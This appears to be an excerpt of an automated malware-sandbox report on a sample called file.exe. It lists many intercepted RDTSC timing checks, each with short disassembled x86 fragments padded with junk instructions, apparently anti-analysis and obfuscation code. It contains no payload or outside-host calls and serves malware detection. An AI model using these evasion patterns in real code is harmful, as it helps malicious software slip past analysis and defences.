Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13D4740 second address: 13D4774 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007F8F34B47B64h 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jmp 00007F8F34B47B5Dh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13D4774 second address: 13D4779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13D4779 second address: 13D47B6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F8F34B47B5Bh 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c jg 00007F8F34B47B5Ch 0x00000012 lea ebx, dword ptr [ebp+124564F6h] 0x00000018 sbb ecx, 782488C4h 0x0000001e xchg eax, ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F8F34B47B60h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13D47B6 second address: 13D47BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13D47BC second address: 13D47C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13D4825 second address: 13D484D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8F347F9F1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F8F347F9F25h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D484D second address: 13D48A0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F8F34B47B58h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000017h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 jmp 00007F8F34B47B5Ch 0x00000028 jng 00007F8F34B47B5Bh 0x0000002e sbb cx, 48FFh 0x00000033 push 00000000h 0x00000035 mov edx, 3083246Ch 0x0000003a call 00007F8F34B47B59h 0x0000003f push eax 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D48A0 second address: 13D48E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8F347F9F1Ah 0x00000009 popad 0x0000000a pop eax 0x0000000b push eax 0x0000000c jc 00007F8F347F9F20h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jmp 00007F8F347F9F26h 0x0000001b mov eax, dword ptr [eax] 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D48E2 second address: 13D48E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D48E6 second address: 13D4913 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F8F347F9F1Ch 0x0000000c jo 00007F8F347F9F16h 0x00000012 popad 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 pushad 0x00000018 jnp 00007F8F347F9F18h 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F8F347F9F1Bh 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D4913 second address: 13D4917 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D4917 second address: 13D49D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 mov dword ptr [ebp+122D1B95h], edi 0x0000000e push 00000003h 0x00000010 call 00007F8F347F9F23h 0x00000015 or edx, dword ptr [ebp+122D36E3h] 0x0000001b pop edi 0x0000001c push 00000000h 0x0000001e push 00000003h 0x00000020 push esi 0x00000021 mov ecx, dword ptr [ebp+122D359Fh] 0x00000027 pop esi 0x00000028 push 929D8EE1h 0x0000002d jmp 00007F8F347F9F28h 0x00000032 xor dword ptr [esp], 529D8EE1h 0x00000039 jmp 00007F8F347F9F28h 0x0000003e lea ebx, dword ptr [ebp+124564FFh] 0x00000044 push 00000000h 0x00000046 push esi 0x00000047 call 00007F8F347F9F18h 0x0000004c pop esi 0x0000004d mov dword ptr [esp+04h], esi 0x00000051 add dword ptr [esp+04h], 00000018h 0x00000059 inc esi 0x0000005a push esi 0x0000005b ret 0x0000005c pop esi 0x0000005d ret 0x0000005e mov dword ptr [ebp+122D25C3h], edi 0x00000064 xchg eax, ebx 0x00000065 jmp 00007F8F347F9F27h 0x0000006a push eax 0x0000006b jbe 00007F8F347F9F2Eh 0x00000071 pushad 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D4B0F second address: 13D4B4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 add dword ptr [esp], 1BD92144h 0x0000000d jmp 00007F8F34B47B5Fh 0x00000012 lea ebx, dword ptr [ebp+1245650Ah] 0x00000018 mov di, dx 0x0000001b mov ecx, dword ptr [ebp+122D3673h] 0x00000021 xchg eax, ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F8F34B47B5Eh 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E6631 second address: 13E6637 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E6637 second address: 13E663D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F49C5 second address: 13F49C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F49C9 second address: 13F49CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F49CD second address: 13F49F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jg 00007F8F347F9F16h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8F347F9F1Fh 0x00000017 js 00007F8F347F9F16h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F27C4 second address: 13F27D9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8F34B47B5Ch 0x00000008 jng 00007F8F34B47B56h 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F2C84 second address: 13F2C90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F8F347F9F16h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F2C90 second address: 13F2C9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jng 00007F8F34B47B56h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F2C9E second address: 13F2CB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8F347F9F1Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F2CB2 second address: 13F2CDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F8F34B47B6Bh 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F2CDA second address: 13F2CF0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8F347F9F16h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jne 00007F8F347F9F16h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F3401 second address: 13F341F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8F34B47B56h 0x00000008 jmp 00007F8F34B47B60h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F341F second address: 13F342E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8F347F9F1Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F342E second address: 13F343E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8F34B47B56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F3997 second address: 13F39B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8F347F9F1Eh 0x00000007 jmp 00007F8F347F9F1Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F39B8 second address: 13F39C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F8F34B47B56h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F39C2 second address: 13F39C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F39C6 second address: 13F39CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F39CC second address: 13F39E9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnp 00007F8F347F9F16h 0x00000009 pop edi 0x0000000a jo 00007F8F347F9F18h 0x00000010 push esi 0x00000011 pop esi 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 jl 00007F8F347F9F1Ch 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E7F24 second address: 13E7F28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E7F28 second address: 13E7F2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CA958 second address: 13CA976 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F8F34B47B56h 0x0000000a jmp 00007F8F34B47B64h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F3B9C second address: 13F3BAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F8F347F9F16h 0x0000000a jbe 00007F8F347F9F16h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F408F second address: 13F40B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8F34B47B68h 0x00000009 popad 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e jbe 00007F8F34B47B56h 0x00000014 pop edi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F40B7 second address: 13F40BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F40BE second address: 13F40E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8F34B47B69h 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F43BF second address: 13F43C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F4540 second address: 13F4562 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8F34B47B67h 0x00000009 pop ecx 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F4562 second address: 13F4566 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F4824 second address: 13F482E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F482E second address: 13F4853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F8F347F9F27h 0x0000000b jnl 00007F8F347F9F16h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F82BA second address: 13F82D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F8F34B47B5Ah 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F82D3 second address: 13F82DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F85ED second address: 13F85F7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8F34B47B5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C593E second address: 13C594E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8F347F9F1Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FF822 second address: 13FF87C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F8F34B47B64h 0x0000000c jmp 00007F8F34B47B5Ch 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 jne 00007F8F34B47B56h 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c jmp 00007F8F34B47B60h 0x00000021 jmp 00007F8F34B47B65h 0x00000026 popad 0x00000027 popad 0x00000028 push edx 0x00000029 pushad 0x0000002a jng 00007F8F34B47B56h 0x00000030 push edi 0x00000031 pop edi 0x00000032 pushad 0x00000033 popad 0x00000034 popad 0x00000035 push ecx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FFB8B second address: 13FFB91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FFB91 second address: 13FFB97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FFEEC second address: 13FFEF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1402791 second address: 140279B instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8F34B47B5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1403503 second address: 1403507 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1403507 second address: 1403517 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14035B9 second address: 14035D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F8F347F9F16h 0x00000009 jbe 00007F8F347F9F16h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14035D2 second address: 14035D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14035D8 second address: 1403620 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebx 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007F8F347F9F18h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 jmp 00007F8F347F9F21h 0x0000002a nop 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e pushad 0x0000002f popad 0x00000030 jnc 00007F8F347F9F16h 0x00000036 popad 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1403620 second address: 1403626 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1403626 second address: 140363A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14038A0 second address: 14038A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1403A66 second address: 1403A75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8F347F9F1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1403A75 second address: 1403A7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1403B14 second address: 1403B18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1403B18 second address: 1403B28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140418F second address: 1404193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140541B second address: 140542E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 popad 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a pushad 0x0000000b push edi 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140542E second address: 1405432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14067A4 second address: 14067A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14067A8 second address: 14067AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14072B3 second address: 14072D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8F34B47B66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jc 00007F8F34B47B64h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14072D8 second address: 14072DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1408809 second address: 140880F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140880F second address: 1408814 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1407B6E second address: 1407B7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8F34B47B5Ah 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14085A4 second address: 14085AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140C0E8 second address: 140C0EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140C0EE second address: 140C111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jnl 00007F8F347F9F27h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140D30C second address: 140D3A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8F34B47B5Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F8F34B47B58h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov edi, dword ptr [ebp+122D1B66h] 0x0000002a call 00007F8F34B47B5Ah 0x0000002f push edi 0x00000030 jmp 00007F8F34B47B5Dh 0x00000035 pop edi 0x00000036 pop edi 0x00000037 push 00000000h 0x00000039 mov edi, dword ptr [ebp+122D2573h] 0x0000003f push 00000000h 0x00000041 push 00000000h 0x00000043 push eax 0x00000044 call 00007F8F34B47B58h 0x00000049 pop eax 0x0000004a mov dword ptr [esp+04h], eax 0x0000004e add dword ptr [esp+04h], 00000014h 0x00000056 inc eax 0x00000057 push eax 0x00000058 ret 0x00000059 pop eax 0x0000005a ret 0x0000005b jmp 00007F8F34B47B65h 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007F8F34B47B5Ah 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140D4EF second address: 140D508 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8F347F9F21h 0x0000000d rdtsc
